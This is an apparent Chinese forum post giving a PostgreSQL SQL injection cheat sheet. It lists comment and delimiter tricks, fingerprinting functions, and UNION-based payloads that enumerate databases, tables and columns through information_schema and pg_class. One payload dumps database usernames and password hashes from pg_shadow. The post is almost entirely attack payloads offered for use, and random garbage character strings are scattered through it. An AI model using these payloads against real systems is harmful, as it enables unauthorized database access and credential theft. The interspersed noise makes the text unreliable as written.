结合了MSSQL MySQL Oracle的一些特点
9 \, N" I8 ~9 g+ ^) |9 X* i支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/* y* x4 G, ?/ C. b. ?
连接符: %20 , + , /**/ 内置函数:) z! q' c0 H1 d& L0 [
current_database() //当前数据库名
9 [- t) X4 |- s5 i8 Fsession_user //会话用户
5 P$ \1 C ^( ?, y+ \current_user //当前数据库用户, i# W: ~- U2 {( A }4 ~
user //当前用户5 z! |' `3 b( }/ n, o. Q
version() //数据库版本 Union注射:0 Y, [5 R4 p7 g. \5 \( V
order by n–0 `9 S. z: E4 U) y" W7 _1 J! T
and 1=2 union select null,null,null–
! X9 a+ a1 R4 K- }9 Vand 1=2 union select ‘beach’,null,null–& U9 s/ B, M7 q$ A# j; Y
and 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):0 D+ j9 T$ l( [8 z6 p% j e' i
group_concat(table_name)
! q+ y$ F t( W+ u R: pand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–1 t( O6 T6 l. w. m; y4 l: K+ t8 y
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
/ y5 y8 q# U5 D( K$ A4 ]9 Z(老版本)3 q5 l6 P9 q4 K! F' D7 Y# M- I
pg_class.oid对应pg_attribute.attrelid9 ^- w7 w y* ]# E! W* q
pg_class.relname表名7 f0 h+ O0 Q& }- D! m5 W
pg_attribute.attname字段名 select relname from pg_class获取表名
% I2 m6 j; n2 ^( x, o' c+ `- Wselect oid from pg_class where 条件 获取参数
8 T: V7 b. a$ K8 _6 Mselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:; j: {9 I: Q8 u/ o e, J3 L
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表5 m% u* U5 Q1 A) i$ {0 l
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
7 W$ k' |/ Y! L2 J由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名( T4 T7 w& ?# v$ g* N
======================================================================
% b5 C& F0 ^3 p2 I* }, H2 Xand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库5 K* u6 _! M! S T8 j& m1 ^
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 | 
抢楼
发表于 2013-10-13 12:57:16
收藏
支持
反对